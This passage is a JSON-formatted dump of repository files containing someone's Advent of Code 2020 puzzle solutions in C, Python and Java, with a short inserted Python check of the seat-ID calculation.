input) != NULL) {\n //NOTE: max is 11, taking the whole string and the '\\0', and leaving the new line character; then there is an extra entry that is '\\n', so we need to take care of that\n if (strcmp(entry, \"\\n\") == 0){\n continue;\n }\n //printf(\"row is %s\\n\", entry);\n\n int row = compute_row(entry);\n int column = compute_column(entry);\n int seat_ID = compute_sID(&row, &column);\n insertArray(&seat_IDs, seat_ID);\n //printf(\"seat_ID %d\\n\", seat_ID);\n if (seat_ID > max) {\n max = seat_ID;\n }\n }\n\n printf(\"max is %d\\n\", max);\n //printf(\"%ld\\n\", seat_IDs.used); // print number of elements\n\n selectionSort(seat_IDs.array, seat_IDs.used);\n\n int missing_value = find_missing_value(seat_IDs);\n printf(\"seat number is %d\\n\", missing_value);\n\n freeArray(&seat_IDs);\n return(0);\n}\n"
},
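The comment block at the top of Challenge5.c observes that the row and column are just binary numbers. Since seat_id = row * 8 + column, the whole 10-character boarding pass is itself one binary number; a compact Python cross-check of that observation (not the author's C approach):

def seat_id(boarding_pass: str) -> int:
    # F/L map to 0 and B/R map to 1; the pass then reads as a 10-bit number.
    bits = boarding_pass.translate(str.maketrans("FBLR", "0101"))
    return int(bits, 2)

assert seat_id("FBFBBFFRLR") == 44 * 8 + 5 == 357
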
{
"alpha_fraction": 0.4273092448711395,
"alphanum_fraction": 0.4626505970954895,
"avg_line_length": 27.295454025268555,
"blob_id": "e2bc8fd600398b93a877395d969893d4da919319",
"content_id": "fe2907c31bafc967e077d149394d154dd9bb1389",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1245,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 44,
"path": "/Challenge3.c",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <limits.h>\n#include <stdbool.h>\n#include <stdlib.h>\n\nint main() {\n FILE *input;\n //arbitrarily set\n int max = 100000;\n char row[max];\n int length_row;\n int slopes[5][2] = {{1 ,1}, {3, 1}, {5, 1}, {7, 1}, {1, 2}};\n long long int result = 1;\n\n for (int i = 0; i < 5; i++) {\n input = fopen(\"inputChallenge3.txt\", \"r\");\n int n_trees = 0;\n int position = -slopes[i][0];\n int counter = 0;\n counter = 0;\n int row_n = -1;\n\n while (fgets(row, max, input) != NULL) {\n row_n = row_n + 1;\n if (counter == 0) {\n length_row = strlen(row);\n //we have 31 numbers, so indices go from 0 to 30, but length is 32 because of the '\\0' at the end of the row, so we need mod length - 1\n position = (position + slopes[i][0]) % (length_row - 1);\n if (row[position] == '#') {\n n_trees = n_trees + 1;\n }\n counter = slopes[i][1] - 1;\n } else {\n counter = counter - 1;\n }\n }\n\n result = result * n_trees;\n }\n\n printf(\"result is %lld\\n\", result);\n}\n"
},
{
"alpha_fraction": 0.5760202407836914,
"alphanum_fraction": 0.5987721085548401,
"avg_line_length": 40.3283576965332,
"blob_id": "24699dee9a563232abd97148d6afe478332e0b35",
"content_id": "3ebc07b373174f78a0ebc6988b1b41299d0a9a9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2769,
"license_type": "no_license",
"max_line_length": 249,
"num_lines": 67,
"path": "/Challenge4.py",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "def valid_byr(key, value):\n return key == \"byr\" and int(value) >= 1920 and int(value) <= 2002\n\ndef valid_iyr(key, value):\n return key == \"iyr\" and int(value) >= 2010 and int(value) <= 2020\n\ndef valid_eyr(key, value):\n return key == \"eyr\" and int(value) >= 2020 and int(value) <= 2030\n\ndef valid_hgt(key, value):\n return (key == \"hgt\" and len(value) == 5 and value.endswith(\"cm\") and int(value[:-2]) >= 150 and int(value[:-2]) <= 193) or (key == \"hgt\" and len(value) == 4 and value.endswith(\"in\") and int(value[:-2]) >= 59 and int(value[:2]) <= 76)\n\ndef valid_hcl(key, value):\n hcl_allowed_symbols = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']\n return key == \"hcl\" and value[:1] == \"#\" and len(value) == 7 and set(value[1:]).issubset(hcl_allowed_symbols)\n\ndef valid_ecl(key, value):\n ecl_allowed_values = ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']\n return key == \"ecl\" and len(value) == 3 and value in ecl_allowed_values\n\ndef valid_pid(key, value):\n pid_allowed_values = [str(i) for i in range(0, 10)]\n return key == \"pid\" and len(value) == 9 and set(list(value)).issubset(pid_allowed_values)\n\ndef present_cid(key, value):\n return key == \"cid\"\n\ndef valid_values(key_value_pairs):\n key_value_pair_iter = iter(key_value_pairs.keys())\n for key in key_value_pair_iter:\n value = key_value_pairs[key]\n if not valid_byr(key, value) and not valid_iyr(key, value) and not valid_eyr(key, value) and not valid_hgt(key, value) and not valid_hcl(key, value) and not valid_ecl(key, value) and not valid_pid(key, value) and not present_cid(key, value):\n return False\n return True\n\ndef valid_passport(keys, encountered_key_value_pairs):\n for key in keys:\n if key != \"cid\" and key not in encountered_key_value_pairs:\n return False\n if not valid_values(encountered_key_value_pairs):\n return False\n return True\n\ndef process_line(line, encountered_key_value_pairs):\n key_value_pairs = line.split(' ')\n for key_value_pair in key_value_pairs:\n key = key_value_pair.split(':')[0]\n value = key_value_pair.split(':')[1]\n encountered_key_value_pairs[key] = value\n\ndef main():\n input = open(\"inputChallenge4.txt\", \"r\");\n\n n_valid = 0\n keys = [\"byr\", \"iyr\", \"eyr\", \"hgt\", \"hcl\", \"ecl\", \"pid\", \"cid\"]\n encountered_key_value_pairs = {}\n\n for line in input:\n if line in ['\\n', '\\r\\n']:\n if valid_passport(keys, encountered_key_value_pairs):\n n_valid = n_valid + 1\n encountered_key_value_pairs = {}\n else:\n line = line.strip('\\n')\n process_line(line, encountered_key_value_pairs);\n print(\"number of valid passports: \", n_valid)\nmain()\n"
},
{
"alpha_fraction": 0.49356725811958313,
"alphanum_fraction": 0.4988304078578949,
"avg_line_length": 32.52941131591797,
"blob_id": "2572704f242d29af7c313a3e6c269773b2a1ca6b",
"content_id": "3f638d4c6ba6d452e1bf0c833e5f1225a32d5465",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3420,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 102,
"path": "/Challenge8/src/Main.java",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "import java.io.File;\nimport java.io.FileNotFoundException;\nimport java.util.ArrayList;\nimport java.util.Scanner;\n\npublic class Main {\n\n private static int accumulator;\n\n private static boolean run_program(ArrayList<Integer> already_seen_indices, ArrayList<String> program) {\n int index = 0;\n while (index < program.size()) {\n if (already_seen_indices.contains(index)) {\n return false;\n }\n\n already_seen_indices.add(index);\n String[] command = program.get(index).split(\" \");\n\n if (command[0].equals(\"jmp\")) {\n index += Integer.parseInt(command[1]);\n continue;\n }\n\n if (command[0].equals(\"acc\")) {\n accumulator += Integer.parseInt(command[1]);\n }\n\n index++;\n }\n\n return true;\n }\n\n //have a while loop that continuously changes a command, checks if it works, if not changes it back, sets a last_changed and continues\n private static void fix_program(ArrayList<String> program) {\n boolean not_good = true;\n int last_changed = -1;\n while (not_good) {\n if (last_changed >= program.size()) {\n System.out.println(\"problem\");\n return;\n }\n for (int i = last_changed + 1; i < program.size(); i++) {\n String[] command = program.get(i).split(\" \");\n if (command[0].equals(\"jmp\")) {\n String newCommand = \"nop\".concat(\" \").concat(command[1]);\n program.set(i, newCommand);\n last_changed = i;\n break;\n } else if (command[0].equals(\"nop\")) {\n String newCommand = \"jmp\".concat(\" \").concat(command[1]);\n program.set(i, newCommand);\n last_changed = i;\n break;\n }\n\n }\n\n accumulator = 0;\n not_good = !run_program(new ArrayList<>(), program);\n\n if (not_good) {\n String[] command = program.get(last_changed).split(\" \");\n if (command[0].equals(\"jmp\")) {\n String newCommand = \"nop\".concat(\" \").concat(command[1]);\n program.set(last_changed, newCommand);\n } else if (command[0].equals(\"nop\")) {\n String newCommand = \"jmp\".concat(\" \").concat(command[1]);\n program.set(last_changed, newCommand);\n }\n }\n }\n }\n\n public static void main(String[] args) {\n accumulator = 0;\n ArrayList<String> program;\n program = new ArrayList<>();\n ArrayList<Integer> already_seen_indices = new ArrayList<>();\n\n try {\n File input = new File(\"inputChallenge8.txt\");\n Scanner myReader = new Scanner(input);\n while (myReader.hasNextLine()) {\n String row = myReader.nextLine();\n if (!row.equals(\"\")) {\n program.add(row);\n }\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n\n run_program(already_seen_indices, program);\n System.out.println(\"Result Part I: \" + accumulator);\n\n fix_program(program);\n System.out.println(\"Result Part II: \" + accumulator);\n }\n\n}\n"
},
{
"alpha_fraction": 0.5865657329559326,
"alphanum_fraction": 0.5865657329559326,
"avg_line_length": 17.875,
"blob_id": "c23a4531c027ccdc82ad02485b0f569c4f90cc19",
"content_id": "da7c3c3872955e3b2843dfac74ad8b039e26af02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1057,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 56,
"path": "/Challenge7/src/Node.java",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "import java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\n\nclass Node {\n private int name;\n private String finish;\n private String colour;\n private List<Node> parents;\n private HashMap<Node, Integer> children;\n\n Node() {\n parents = new ArrayList<>();\n children = new HashMap<>();\n }\n\n public int getName() {\n return name;\n }\n\n void setName(int name) {\n this.name = name;\n }\n\n public String getFinish() {\n return finish;\n }\n\n void setFinish(String finish) {\n this.finish = finish;\n }\n\n public String getColour() {\n return colour;\n }\n\n void setColour(String colour) {\n this.colour = colour;\n }\n\n public List<Node> getParents() {\n return parents;\n }\n\n public void addParent(Node parent) {\n this.parents.add(parent);\n }\n\n public HashMap<Node, Integer> getChildren() {\n return children;\n }\n\n public void addChild(Node child, Integer number) {\n children.put(child, number);\n }\n}\n"
},
{
"alpha_fraction": 0.5210330486297607,
"alphanum_fraction": 0.5315985083580017,
"avg_line_length": 28.715116500854492,
"blob_id": "dac5e43582896302caf1987dca1938ebdcda63d4",
"content_id": "fe82c52604fe4f469c9ed278d4b0a9939bbc4ec6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 5111,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 172,
"path": "/Challenge6.c",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <limits.h>\n#include <stdbool.h>\n#include <stdlib.h>\n#include <math.h>\n#include <ctype.h>\n\n//3427\n//array is stolen\ntypedef struct {\n char * array;\n size_t used;\n size_t size;\n} Array;\n\nvoid initArray(Array *a, size_t initialSize) {\n a->array = malloc(initialSize * sizeof(int));\n a->used = 0;\n a->size = initialSize;\n}\n\nvoid insertArray(Array *a, int element) {\n // a->used is the number of used entries, because a->array[a->used++] updates a->used only *after* the array has been accessed.\n // Therefore a->used can go up to a->size\n if (a->used == a->size) {\n a->size *= 2;\n a->array = realloc(a->array, a->size * sizeof(char));\n }\n a->array[a->used++] = element;\n}\n\nvoid freeArray(Array *a) {\n free(a->array);\n a->array = NULL;\n a->used = a->size = 0;\n}\n\n//from here on it is not\nvoid removeArray(Array *a, int * position) {\n if (*position >= 0 && *position < a -> used) {\n for (int i = * position; i < a -> used; i++) {\n a -> array[i] = a -> array[i + 1];\n }\n a -> used = (a -> used) - 1;\n } else {\n perror(\"position is not valid\\n\");\n }\n}\n\nvoid print_Array(Array *a) {\n for (int i = 0; i < a -> used; i++) {\n printf(\"%c, \", a -> array[i]);\n }\n printf(\"\\n\");\n}\n\nbool is_value_in_Array(Array * array, char * value) {\n for (int i = 0; i < array -> used; i++) {\n if (array -> array[i] == *value) {\n return true;\n }\n }\n return false;\n}\n\nbool is_value_in_array(char * array, char * value) {\n for (int i = 0; i < strlen(array); i++) {\n if (array[i] == *value) {\n return true;\n }\n }\n return false;\n}\n\nvoid remove_illegal_symbols_from_Array(Array *a, char * alphabet) {\n int counter = 0;\n for (int i = 0; i < a -> used; i++) {\n if (a -> array[i] == NULL || !is_value_in_array(alphabet, &(a -> array[i]))) {\n counter = counter + 1;\n for (int j = i; j < a -> used; j++) {\n a -> array[j] = a -> array[j + 1];\n }\n if (a -> used == 1 && is_value_in_array(alphabet, &(a -> array[0]))) {\n insertArray(a, '\\0');\n break;\n } else {\n a -> used = (a -> used) - counter;\n }\n }\n }\n}\n\nvoid process_row_any(char * entry, Array * positive_questions_any) {\n for (int i = 0; i < strlen(entry) - 1; i++) {\n if (!is_value_in_Array(positive_questions_any, &entry[i])) {\n insertArray(positive_questions_any, entry[i]);\n }\n }\n}\n\nvoid process_row_all(char * entry, Array * positive_questions_all, bool * new, char * alphabet) {\n if (*new) {\n for (int i = 0; i < strlen(entry) - 1; i++) {\n if (is_value_in_array(alphabet, &entry[i])) {\n insertArray(positive_questions_all, entry[i]);\n }\n }\n } else {\n for (int i = (positive_questions_all -> used) - 1; i >= 0; i--) {\n if (!is_value_in_array(entry, &positive_questions_all -> array[i])){\n positive_questions_all -> array[i] = NULL;\n remove_illegal_symbols_from_Array(positive_questions_all, alphabet);\n }\n }\n }\n printf(\"List of current positively answered questions: \");\n print_Array(positive_questions_all);\n\n}\n\nint main() {\n FILE *input;\n input = fopen(\"inputChallenge6.txt\", \"r\");\n //input = fopen(\"exampleInputC6.txt\", \"r\");\n //input = fopen(\"input2C6.txt\", \"r\");\n int max_row_length = 10000;\n char entry[max_row_length];\n Array positive_questions_any;\n Array positive_questions_all;\n initArray(&positive_questions_any, 1);\n initArray(&positive_questions_all, 1);\n int result_any = 0;\n int result_all = 0;\n bool new = true;\n\n char alphabet[27];\n int i = 0;\n for (char c = 'a'; c <= 'z'; c++) 
{\n alphabet[i] = c;\n i++;\n }\n alphabet[26] = '\\0';\n\n while (fgets(entry, max_row_length, input) != NULL) {\n //NOTE: max is 11, taking the whole string and the '\\0', and leaving the new line character; then there is an extra entry that is '\\n', so we need to take care of that\n if (strcmp(entry, \"\\n\") == 0){\n result_any = result_any + positive_questions_any.used;\n result_all = result_all + positive_questions_all.used;\n printf(\"intermediate result_all is %d\\n\", result_all);\n printf(\"\\n\");\n printf(\"new group\\n\");\n freeArray(&positive_questions_any);\n freeArray(&positive_questions_all);\n initArray(&positive_questions_any, 1);\n initArray(&positive_questions_all, 1);\n new = true;\n continue;\n }\n printf(\"\\n\");\n printf(\"new person, entry is %s\\n\", entry);\n process_row_any(entry, &positive_questions_any);\n process_row_all(entry, &positive_questions_all, &new, alphabet);\n new = false;\n }\n\n printf(\"result for Part 1 is %d\\n\", result_any);\n printf(\"result for Part 2 is %d\\n\", result_all);\n\n return(0);\n}\n"
}
] | 9 |
Lbatson/first-pick-homeschool
|
https://github.com/Lbatson/first-pick-homeschool
|
81914bc56147e68354081ef65e107e7325da1cae
|
3d4b3ef05d208c01ecb7b2a96d17253bceef4628
|
ba81b287fbfbf5bbbc13a16fbc1452244961b818
|
refs/heads/master
| 2023-01-24T04:05:31.815963 | 2020-09-25T20:28:08 | 2020-09-25T20:28:08 | 229,843,569 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5718749761581421,
"alphanum_fraction": 0.5927083492279053,
"avg_line_length": 33.28571319580078,
"blob_id": "0520e7e174516e1bdd782bd88d6a057d69a1f392",
"content_id": "922598224a112efefd058fc3ad8ddd83b84bafbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 28,
"path": "/fphs/curriculums/migrations/0010_auto_20200529_0201.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-05-29 02:01\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0009_review\"),\n ]\n\n operations = [\n migrations.RemoveField(model_name=\"curriculum\", name=\"consumable\",),\n migrations.RemoveField(model_name=\"curriculum\", name=\"format\",),\n migrations.RemoveField(model_name=\"curriculum\", name=\"levels\",),\n migrations.RemoveField(model_name=\"curriculum\", name=\"price\",),\n migrations.RemoveField(model_name=\"curriculum\", name=\"subscription\",),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"religious_preference\",\n field=models.CharField(\n choices=[(\"R\", \"Religious\"), (\"N\", \"Faith Neutral\"), (\"S\", \"Secular\")],\n max_length=1,\n null=True,\n ),\n ),\n migrations.DeleteModel(name=\"Level\",),\n ]\n"
},
{
"alpha_fraction": 0.6080051064491272,
"alphanum_fraction": 0.6086404323577881,
"avg_line_length": 29.86274528503418,
"blob_id": "7a547bd9fbed1b7389881c560e970420404e9704",
"content_id": "950e800703d69dede0e96617272f69b6a0905685",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1574,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 51,
"path": "/fphs/utils/views.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib import messages\nfrom django.http import HttpResponse\nfrom django.views.generic.edit import FormView\nfrom django.views.decorators.http import require_GET\nfrom django.utils.translation import gettext_lazy as _\nfrom django.urls import reverse\n\nfrom .forms import ContactForm\nfrom .models import Contact\n\n\n@require_GET\ndef robots_txt(request):\n isProd = request.get_host().split(\".\")[0] == \"firstpickhomeschool\"\n lines = [\n \"User-Agent: *\",\n f\"Disallow: {'/admin' if isProd else '/'}\",\n f\"Sitemap: { request.scheme }://{ request.get_host() }/sitemap.xml\",\n ]\n return HttpResponse(\"\\n\".join(lines), content_type=\"text/plain\")\n\n\nclass ContactView(FormView):\n form_class = ContactForm\n template_name = \"pages/contact.html\"\n\n def form_invalid(self, form):\n if form.errors.as_data()[\"captcha\"]:\n messages.error(\n self.request,\n _(\"Sorry, but we're unable to process your request at this time.\"),\n )\n return super().form_invalid(form)\n\n def form_valid(self, form):\n Contact(\n email=form.cleaned_data[\"email\"], message=form.cleaned_data[\"message\"]\n ).save()\n return super().form_valid(form)\n\n def get_success_url(self):\n messages.success(\n self.request,\n _(\n \"\"\"\n Thanks for contacting First Pick Homeschool!\n We appreciate you reaching out to us and we will get back to you soon.\n \"\"\"\n ),\n )\n return reverse(\"home\")\n"
},
{
"alpha_fraction": 0.7007672786712646,
"alphanum_fraction": 0.7007672786712646,
"avg_line_length": 34.54545593261719,
"blob_id": "e8d8e2fcba14efbb8d16551661b09f2f1776f906",
"content_id": "f04f8ef378ec5ad49026ccd3eca7795e579877f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 11,
"path": "/fphs/utils/middleware.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\nfrom django.middleware.common import CommonMiddleware\n\n\nclass OverrideCommonMiddleware(CommonMiddleware):\n def process_request(self, request):\n # Override to let health check bypass ALLOWED_HOSTS\n if request.path_info == \"/health/\":\n return HttpResponse(\"OK\")\n else:\n return super().process_request(request)\n"
},
{
"alpha_fraction": 0.5723844170570374,
"alphanum_fraction": 0.5875912308692932,
"avg_line_length": 44.66666793823242,
"blob_id": "7b0774958959d72234cdfc425b48b1ca9fa8f618",
"content_id": "48a9384f44b312da544d806c9b598ea5aa7dbc6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1644,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 36,
"path": "/config/settings/local.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from .base import * # noqa\nfrom .base import env\n\n# WhiteNoise\n# ------------------------------------------------------------------------------\n# http://whitenoise.evans.io/en/latest/django.html#using-whitenoise-in-development\nINSTALLED_APPS = [\"whitenoise.runserver_nostatic\"] + INSTALLED_APPS # noqa F405\n\n# django-debug-toolbar\n# ------------------------------------------------------------------------------\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#prerequisites\n# INSTALLED_APPS += [\"debug_toolbar\"] # noqa F405\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#middleware\n# MIDDLEWARE += [\"debug_toolbar.middleware.DebugToolbarMiddleware\"] # noqa F405\n# https://django-debug-toolbar.readthedocs.io/en/latest/configuration.html#debug-toolbar-config\n# DEBUG_TOOLBAR_CONFIG = {\n# \"DISABLE_PANELS\": [\"debug_toolbar.panels.redirects.RedirectsPanel\"],\n# \"SHOW_TEMPLATE_CONTEXT\": True,\n# }\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#internal-ips\nINTERNAL_IPS = [\"127.0.0.1\", \"10.0.2.2\"]\nif env.bool(\"USE_DOCKER\", default=False):\n import socket\n\n hostname, _, ips = socket.gethostbyname_ex(socket.gethostname())\n INTERNAL_IPS += [\".\".join(ip.split(\".\")[:-1] + [\"1\"]) for ip in ips]\n\n\n# django-extensions\n# ------------------------------------------------------------------------------\n# https://django-extensions.readthedocs.io/en/latest/installation_instructions.html#configuration\n# INSTALLED_APPS += [\"django_extensions\"] # noqa F405\n\n\n# Your stuff...\n# ------------------------------------------------------------------------------\n"
},
{
"alpha_fraction": 0.3786885142326355,
"alphanum_fraction": 0.3863388001918793,
"avg_line_length": 28.7560977935791,
"blob_id": "2b739b82ba24909f2806e4a5ed43ddbea41f59ba",
"content_id": "d418d8500a6af5467156499b2352f38518edbcf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3660,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 123,
"path": "/fphs/curriculums/migrations/0002_auto_20191225_0321.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2019-12-25 03:21\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0001_initial\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"Age\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=3)),\n ],\n ),\n migrations.CreateModel(\n name=\"Category\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name=\"Grade\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=20)),\n ],\n ),\n migrations.CreateModel(\n name=\"Level\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=20)),\n ],\n ),\n migrations.CreateModel(\n name=\"Subject\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=50)),\n ],\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"ages\",\n field=models.ManyToManyField(\n related_name=\"curriculums\", to=\"curriculums.Age\"\n ),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"categories\",\n field=models.ManyToManyField(\n related_name=\"curriculums\", to=\"curriculums.Category\"\n ),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"grades\",\n field=models.ManyToManyField(\n related_name=\"curriculums\", to=\"curriculums.Grade\"\n ),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"levels\",\n field=models.ManyToManyField(\n related_name=\"curriculums\", to=\"curriculums.Level\"\n ),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"subjects\",\n field=models.ManyToManyField(\n related_name=\"curriculums\", to=\"curriculums.Subject\"\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.39214658737182617,
"alphanum_fraction": 0.4157068133354187,
"avg_line_length": 32.50877380371094,
"blob_id": "4612ebab2650d135c776c50b58c09785944447b3",
"content_id": "579733fa71e7c966e9272a5c9d8ed55788a1fa2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1910,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 57,
"path": "/fphs/curriculums/migrations/0009_review.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-03-29 17:06\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n (\"curriculums\", \"0008_auto_20200315_1541\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"Review\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"content\", models.TextField(blank=True, max_length=5000)),\n (\n \"rating\",\n models.IntegerField(\n choices=[(1, \"1\"), (2, \"2\"), (3, \"3\"), (4, \"4\"), (5, \"5\")]\n ),\n ),\n (\"verified\", models.BooleanField(default=False)),\n (\"created\", models.DateTimeField(auto_now_add=True)),\n (\"updated\", models.DateTimeField(auto_now=True)),\n (\n \"curriculum\",\n models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE,\n related_name=\"reviews\",\n to=\"curriculums.Curriculum\",\n ),\n ),\n (\n \"user\",\n models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE,\n related_name=\"reviews\",\n to=settings.AUTH_USER_MODEL,\n ),\n ),\n ],\n options={\"ordering\": [\"-updated\"],},\n ),\n ]\n"
},
{
"alpha_fraction": 0.5313432812690735,
"alphanum_fraction": 0.5880597233772278,
"avg_line_length": 18.705883026123047,
"blob_id": "b60fe0bd29e7c097352f826e4dd6cb5b7088f162",
"content_id": "5f53277fef835e5ae0b7efcef12191542b5d32f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 335,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 17,
"path": "/fphs/users/migrations/0009_remove_user_occupation.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-31 00:02\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0008_user_favorite_curriculums'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='user',\n name='occupation',\n ),\n ]\n"
},
{
"alpha_fraction": 0.44355300068855286,
"alphanum_fraction": 0.4590258002281189,
"avg_line_length": 28.576271057128906,
"blob_id": "31c5fc28a27e6493143bcf4cf60795c9ca67e34a",
"content_id": "d11932ce9fc8fe93747f5babf0bc23a7b6136c62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1745,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 59,
"path": "/fphs/curriculums/migrations/0004_auto_20200103_2349.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-01-03 23:49\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0003_curriculum_link\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"Publisher\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=100)),\n (\"link\", models.URLField()),\n ],\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"consumable\",\n field=models.CharField(\n choices=[(\"Y\", \"Yes\"), (\"N\", \"No\"), (\"M\", \"Mixed\")],\n max_length=1,\n null=True,\n ),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"price\",\n field=models.DecimalField(decimal_places=2, default=0.0, max_digits=8),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"subscription\",\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"publisher\",\n field=models.ForeignKey(\n null=True,\n on_delete=django.db.models.deletion.CASCADE,\n related_name=\"curriculums\",\n to=\"curriculums.Publisher\",\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7210526466369629,
"alphanum_fraction": 0.7298245429992676,
"avg_line_length": 35.774192810058594,
"blob_id": "0fc6aa173c97b2ee06e39694780e9f3443126f2d",
"content_id": "ed7fe0305b2a06d707050df70622347a4b223e55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1140,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 31,
"path": "/fphs/users/models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
